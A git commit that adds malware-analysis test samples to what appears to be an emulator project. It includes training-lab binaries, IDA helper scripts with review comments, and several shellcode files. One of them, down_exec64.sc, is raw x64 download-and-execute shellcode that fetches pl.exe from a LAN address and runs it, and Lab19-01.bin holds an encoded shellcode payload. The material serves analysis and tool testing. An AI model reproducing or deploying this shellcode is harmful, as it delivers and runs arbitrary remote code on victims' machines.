
Samples for testing 👍
Enjoy ;)
Coldzer0 committed Sep 29, 2018
1 parent 027fc59 commit 7f99f49
Showing 96 changed files with 72 additions and 1 deletion.
1 change: 0 additions & 1 deletion .gitignore
Expand Up @@ -44,7 +44,6 @@ __recovery/
# unwanted folders :D
unicorn-engine-pascal
CTF
samples
GDT
win_dlls
Build/OSX
Binary file added samples/AntiDbgx32.exe
Binary file not shown.
Binary file added samples/AntiDbgx64.exe
Binary file not shown.
Binary file added samples/AntiDebugDownloader.exe
Binary file not shown.
Binary file added samples/AntiEmu/blue.exe
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_10L/Lab10-01.sys
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
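--- a/samples/BinaryCollection/Chapter_11L/Lab11-02.ini
+++ b/samples/BinaryCollection/Chapter_11L/Lab11-02.ini
@@ -0,0 +1 @@
+CHMMXaL@MV@SD@O@MXRHRCNNJBNL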
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
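--- a/samples/BinaryCollection/Chapter_17L/findAntiVM.py
+++ b/samples/BinaryCollection/Chapter_17L/findAntiVM.py
@@ -0,0 +1,14 @@
+from idautils import *
+from idc import *
+
+heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
+antiVM = []
+for i in heads:
+if (GetMnem(i) == "sidt" or GetMnem(i) == "sgdt" or GetMnem(i) == "sldt" or GetMnem(i) == "smsw" or GetMnem(i) == "str" or GetMnem(i) == "in" or GetMnem(i) == "cpuid"):
+antiVM.append(i)
+
+print "Number of potential Anti-VM instructions: %d" % (len(antiVM))
+
+for i in antiVM:
+SetColor(i, CIC_ITEM, 0x0000ff)
+Message("Anti-VM: %08x\n" % i)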
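Review bot: The scan at `Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))` covers only the segment that contains the cursor, so anti-VM instructions in any other segment are silently missed while the printed count reads as if it covered the whole binary. Either state that limit in a header comment or iterate every segment, e.g. `for seg in Segments():` followed by `for i in Heads(SegStart(seg), SegEnd(seg)):`. The `GetMnem(i) == ...` chain also calls GetMnem up to seven times per head; `if GetMnem(i) in ("sidt", "sgdt", "sldt", "smsw", "str", "in", "cpuid"):` is equivalent and easier to extend. Because `in` is an ordinary port-I/O instruction, a comment should say that the coloured hits are candidates for manual triage, not confirmed VM checks.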
Binary file added samples/BinaryCollection/Chapter_18L/Lab18-01.exe
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_18L/Lab18-02.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_18L/Lab18_05.exe
Binary file not shown.
1 change: 1 addition & 0 deletions samples/BinaryCollection/Chapter_19L/Lab19-01.bin
@@ -0,0 +1 @@
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3�f���^V����Ѐ�A���,AªIu�������IJOFIBOMEAAAAAAAOJDDABAAAAFGFHILHECEAMDBPPPMDBMAKMDIOAHEAKMBMPANABMHOJOPPPPPPPIJPIFPFOMCAEAAGAILGMCECEILEFDMILFEAFHIABOKILEKBIILFKCAABOLODCKEJILDEILABOOFGOILLPPPPPPDLEECECIHFOMILFKCEABOLGGILAMELILFKBMABOLILAEILABOIOJACAAAAAADBMAIJEECEBMGBMCAIAAFGDBMAGEILEADAIFMAHIAPILEAAMILHABMKNILEAAIOJAFAAAAAAOJPLPPPPPPFOMDFLOINJPPPPPPIJMCGIIOEOAOOMFCOIIAPPPPPPIJEFPMGIMBHJOFLIFCOIHCPPPPPPIJEFPIGIIDLJLFHIFCOIGEPPPPPPIJEFPEGIOGBHIPHLFCOIFGPPPPPPIJEFPAGIJIPOIKAOFCOIEIPPPPPPIJEFOMINADFAPPFFPMGIDGBKCPHAFAOIDEPPPPPPIJEFOIGIIAAAAAAAINHLEIFHPPFFPIABMHMHAHFMDBCOGFMHEHAEHIGFAAAADBMJFBFBINEDEIFAINEDAHFAFBPPFFOIGIAFAAAAAAINEDEIFAPPFFOMPPFFPAGIAAAAAAAAFAPPFFPEOIFGPPPPPPFFFCEMENEPEOAAGIHEHEHADKCPCPHHHHHHCOHAHCGBGDHEGJGDGBGMGNGBGMHHGBHCGFGBGOGBGMHJHDGJHDCOGDGPGNCPHDGIGFGMGMGDGPGEGFCPGBGOGOGPHJFPHFHDGFHCCOGFHIGFAA
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_19L/Lab19-03.pdf
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_19L/Lab19-03_sc.bin
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_1L/Lab01-01.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_1L/Lab01-03.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
1 change: 1 addition & 0 deletions samples/BinaryCollection/Chapter_20L/config.dat
@@ -0,0 +1 @@
|y`~`~`NNNNNNN/N6O{NN:N6/{N<N`N+N6N+NNN6O{N��������FNNNNNN|y`~`~`N{NqNNNONNNoNNNfF N�PZN�MNN�F{N�INNNNNN��\N�NH{N6O{NNNNONNN
Binary file added samples/BinaryCollection/Chapter_21L/Lab21-01.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_3L/Lab03-02.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_5L/Lab05-01.dll
Binary file not shown.
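--- a/samples/BinaryCollection/Chapter_5L/Lab05-01.py
+++ b/samples/BinaryCollection/Chapter_5L/Lab05-01.py
@@ -0,0 +1,6 @@
+sea = ScreenEA()
+
+for i in range(0x00,0x50):
+b = Byte(sea+i)
+decoded_byte = b ^ 0x55
+PatchByte(sea+i,decoded_byte)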
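Review bot: The script carries no comment saying what it decodes or where the cursor must be placed, and because it patches the database in place with an XOR, a second run over the same range restores the encoded bytes. A header comment such as `# XOR-decode 0x50 bytes starting at the cursor with key 0x55; run once, a second run re-encodes the range` would cover both points. It also uses `ScreenEA`, `Byte` and `PatchByte` without any import, so it presumably relies on IDA's interactive namespace; adding `from idc import *`, as findAntiVM.py in this commit does, would make that dependency explicit.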
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_7L/Lab07-03.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_9L/DLL1.dll
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_9L/DLL2.dll
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_9L/DLL3.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/Downloader.exe
Binary file not shown.
Binary file added samples/Int3Hook.exe
Binary file not shown.
Binary file added samples/MessageBox_x64.exe
Binary file not shown.
Binary file added samples/PEB_MSGBOX.exe
Binary file not shown.
Binary file added samples/Shellcodes/MsgBox64.sc
Binary file not shown.
Binary file added samples/Shellcodes/URLDownloadToFile.sc
Binary file not shown.
Binary file added samples/Shellcodes/Wincalc.sc
Binary file not shown.
1 change: 1 addition & 0 deletions samples/Shellcodes/down_exec64.sc
@@ -0,0 +1 @@
HƒěXLŤ4$HƒěXH1ŇeH‹B`H‹pH‹vH­H‹0H‹~0‹_<Hű˛ˆ‹Hű‹sHţfş?‹–HH1ŇAÇurlmfAÇFonAˆVIŤ˙ÓfşJ‹–HH1ŇHąURLDownlI‰HąoadToFilI‰NfAÇFeAAˆVIŤH‰Á˙ÓI‰ÇH¸C:\\UserI‰H¸s\\PubliIFH¸c\\p.exeI‰FH1ŇAˆVIŤNH¸http://1H‰H¸92.168.1H‰AH¸0.129/plH‰AA.exeˆQHƒěXH1ÉIŤVMŤM1ÉLL$ A˙×H1ŇH9ĐuăHƒěXfşk‹–HIŤH1Ҳ˙ÓH1Ňfş"‹–HűIŤH1Ň˙ÓH1Ňfş(‹–HűHƒÄXH1É˙Ó
Binary file added samples/Shellcodes/tm.sc
Binary file not shown.
Binary file added samples/case.exe
Binary file not shown.
Binary file added samples/cpuid.exe
Binary file not shown.
Binary file added samples/dropper.exe
Binary file not shown.
Binary file added samples/mal.exe
Binary file not shown.
Binary file added samples/malxx.exe
Binary file not shown.
Binary file added samples/obfuscated/obfuscated.exe
Binary file not shown.
Binary file added samples/obfuscated/original.exe
Binary file not shown.
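--- a/samples/obfuscated/source.asm
+++ b/samples/obfuscated/source.asm
@@ -0,0 +1,48 @@
+;
+; Obfuscator v2.0 sample
+;
+; Bartosz Wójcik | www.pelock.com
+;
+.586
+.model flat,stdcall
+
+includelib \masm32\lib\kernel32.lib
+includelib \masm32\lib\user32.lib
+
+include \masm32\include\kernel32.inc
+include \masm32\include\user32.inc
+include \masm32\include\windows.inc
+
+assume fs:flat
+
+.data
+szCaption db 'Visit us at www.pelock.com',0
+szText db 'Hello world',0
+.code
+
+
+ShowInformation proc
+
+;
+; MessageBox(NULL, "Hello world", "Visit us at www.pelock.com", MB_ICONINFORMATION);
+;
+push MB_ICONINFORMATION
+push offset szCaption
+push offset szText
+push 0
+call MessageBoxA
+
+ret
+
+ShowInformation endp
+
+start:
+call ShowInformation
+
+;
+; ExitProcess(0);
+;
+push 0
+call ExitProcess
+
+end start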
Binary file added samples/small.exe
Binary file not shown.
Binary file added samples/url.exe
Binary file not shown.
